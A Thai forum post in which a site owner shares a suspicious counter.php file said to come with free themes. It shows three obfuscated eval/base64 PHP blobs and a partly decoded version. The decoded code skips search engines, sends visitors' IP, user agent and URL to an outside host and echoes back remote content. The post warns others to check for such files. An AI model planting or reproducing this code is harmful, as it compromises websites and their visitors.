ข้างใน counter.php ใครแปลได้ก็เอามาแฉหน่อยครับ 
<?php
//Counter V.2.35
//Generated by server
//Do not delete
eval(gzuncompress(base64_decode('eF6lUsFqwkAU/JUeCqtQiiS1ECQHe0ikCJJt0exKCdlNFNKIYkBIvl7nJYVqnicPmbfsvDczu5vncL74mM6/1iJJ000ifvzp8ZjWA5NW+ftbkuV2n+UDYcXTq3AlsAZkoVcZl1YlkPitD/TF8OV22pW1vXwM0+qSJt/xx1hyYzXuqxNDcwDOH6nueiPRA6nIk59Xu6DR4L/VKHYoYakc71dHPnN/WfyJlkqvxqiFceg8Zf8+sX3prlD1CjgugKbz6E/80+46JaMLzWs9rkvByl3WBjXwDmZHP8eo76rQFXgN5YzlCdXOIubsYKi71Wx0jIU82RkqN9Fpgy5zYAhYFkwKEG2SwoRdmgibeIXh5AxE9+BR'))); ?><? eval(gzuncompress(base64_decode('eF5Vj9tqg0AQhl8liGQT8ELMVQmhCG60kmizMdS0FBnPS3RXVrclCX33rrE3vZmPOf3zTylZNlDOZgDlQqfLuw4bWwi4LpAXRa/J6YhJYrs4iJChaQaqOK+aAhnoCjXniinQXCq2PVORd4UAxawWvB3HUsoqhR5KEHTM+aDiQ5rgLSaYTLoE78MIJ7bjqMLU98KjOorAI2bm8K+dlfep5dep61/TVX57j/1b7m5NiAMT3vbybD0Nu1VgnmPiTTzIzK2/lcQz7TYK/2/MZa+8VgUbxt485y1QxqAtxvRh8M/AvJRN08FQTxqHEz5GyYm8jFtZXWSXsd5wflGfhJqhzbTlWhSDFGymw4dOP9c/v836bFU='))); ?><? eval(gzuncompress(base64_decode('eF6FlG1rgzAQgP+KhWINK8Mk1rZIYN1wZeDaYXVfRMRtuhXKCn3Zl+J/30VTNTSQT4bkubtw98RtaQ22x2NxsoZ5Xv5lNkKX793+I98ZYsMTX3bYn3+/LPsOI7GF2XAZrB8XwSYZZRCdjdLETq1htvHDdz9MYMuyUXrFCVvFQSBiKeOnkGpbWtZtGgxp6vvgMecIQowZZb47Fsg0FTyRearjqcw7Ot6R+YmOn8i8q+NdmZ/q+KnMz3T8TObnOn4u8xi06A1AmjDGKB0004QxXWCewqe+BpiCB5DhdDgXhmkaKsTpEHRppk8VhmFQrHYHhmDc1ysXFgqHuETSJaZQQYTM1CGdR1dwrga5QP3chIve5CZYHcIdkkJIF0Ih5NqTpR/VT4fwhojnQlSNaCWjyKsqaHzTNGIMoNP8rUEbbx4oblUj46c4DNZvURb6URyuonCx2jz74bh76FD+NkHrXpcgenn113HURoLv4uIOe1CkaHUk9Q+gubeTiMIoZbVPBCYsROif1Ucu8orPn734STlepajSSgxVquofilhu0g=='))); ?>
และอีกหลาย file จำไม่ได้ละเจอ file แปลกลบไว้ก่อน แนะนำให้ท่านๆ หมั่นตรวจสอบดู file แปลกปลอมด้วยนะครับ ก่อนที่จะมานั่งเสียอารมณ์+เสียใจทีหลัง

มันเป็น eval gzuncompress base64_decode จากข้างบนมีอยู่สามส่วน ข้างล่างนี้แกะแล้วแต่ก็ยังงงอยู่ใช่ไหม

$GLOBALS['_aaf_']=Array(base64_decode('c' .'3R' .'y' .'dG9sb3' .'dl' .'c' .'g=' .'='),base64_decode('c3Ryc3Ry'),base64_decode('c' .'3Ry' .'c3Ry'),base64_decode('' .'c3Ryc3' .'Ry'),base64_decode('c3Ryc3Ry'),base64_decode('c3Ryc3' .'R' .'y'),base64_decode('c3Ry' .'c3Ry'),base64_decode('c3Ryc3Ry'),base64_decode('' .'c3Ryc3' .'Ry'),base64_decode('c3R' .'yc3Ry'),base64_decode('YmFzZ' .'TY0X2' .'RlY29kZQ=='),base64_decode('dXJ' .'sZW5' .'jb2R' .'l'),base64_decode('' .'dXJs' .'ZW' .'5j' .'b2' .'Rl'),base64_decode('dXJ' .'sZW5j' .'b2Rl'),base64_decode('dXJsZW' .'5j' .'b2Rl'),base64_decode('Y' .'3Vyb' .'F9pbml' .'0'),base64_decode('Y3VybF9z' .'ZXRv' .'cHQ='),base64_decode('' .'Y3Vyb' .'F9zZX' .'RvcH' .'Q='),base64_decode('Y3VybF9' .'le' .'G' .'Vj'),base64_decode('Y' .'3VybF9jbG9z' .'ZQ' .'=='));function aaf($i){$a=Array('HTTP_USER_AGENT',"",'google','yahoo','baidu','msn','opera','chrome','bing','safari','bot','HTTP_REFERER',"",'REMOTE_ADDR','HTTP_HOST','aHR0cDovL2dsb2JhbGJyb3dzZXJzdGF0aXN0aWMuY29tL3N0YXRHL3N0YXQucGhw','?ip=','REMOTE_ADDR','&useragent=','&domainname=','HTTP_HOST','&fullpath=','REQUEST_URI','&check=','look',"O"," ");return $a[$i];}if(!isset($aafv_0)){global $aafv_0;$aafv_0=round(0+1);$aafv_1=$GLOBALS['_aaf_'][0]($_SERVER[aaf(0)]);$aafv_2=NULL;$aafv_3=aaf(1);if(($GLOBALS['_aaf_'][1]($aafv_1,aaf(2))== false)&&($GLOBALS['_aaf_'][2]($aafv_1,aaf(3))== false)&&($GLOBALS['_aaf_'][3]($aafv_1,aaf(4))== false)&&($GLOBALS['_aaf_'][4]($aafv_1,aaf(5))== false)&&($GLOBALS['_aaf_'][5]($aafv_1,aaf(6))== false)&&($GLOBALS['_aaf_'][6]($aafv_1,aaf(7))== false)&&($GLOBALS['_aaf_'][7]($aafv_1,aaf(8))== false)&&($GLOBALS['_aaf_'][8]($aafv_1,aaf(9))== false)&&($GLOBALS['_aaf_'][9]($aafv_1,aaf(10))== false)&&$_SERVER[aaf(11)]!=aaf(12)){if(isset($_SERVER[aaf(13)])== true && isset($_SERVER[aaf(14)])== true){$aafv_3=$GLOBALS['_aaf_'][10](aaf(15)) .aaf(16) .$GLOBALS['_aaf_'][11]($_SERVER[aaf(17)]) .aaf(18) .$GLOBALS['_aaf_'][12]($aafv_1) .aaf(19) .$GLOBALS['_aaf_'][13]($_SERVER[aaf(20)]) .aaf(21) .$GLOBALS['_aaf_'][14]($_SERVER[aaf(22)]) .aaf(23) .isset($_GET[aaf(24)]);$aafv_2=$GLOBALS['_aaf_'][15]($aafv_3);}}if($aafv_2 !== NULL){$GLOBALS['_aaf_'][16]($aafv_2,CURLOPT_RETURNTRANSFER,round(0+1));$GLOBALS['_aaf_'][17]($aafv_2,CURLOPT_TIMEOUT,round(0+6));$aafv_4=@$GLOBALS['_aaf_'][18]($aafv_2);if($aafv_4[round(0)]==aaf(25)){$aafv_4[round(0)]=aaf(26);echo $aafv_4;}$GLOBALS['_aaf_'][19]($aafv_2);}}พวกนี้จะมากับธีมที่แจกฟรีครับ ถ้าแกะโค้ดไม่เป็นอย่าเอามาใช้มันไม่คุ้มเสีย แกะโค้ดไม่ยากครับใครชอบธีมฟรีต้องหัดไว้ก็ดีนะ มีเว็บให้ก๊อปโค้ดไปใส่ แต่ต้องมีพื้นฐาน php บ้างนะครับ
http://www.mobilefish.com/serv...se64/eval_gzinflate_base64.php 
แต่ถ้ามันกันมาหลายชั้นก็ปวดหัวกับมันหน่อย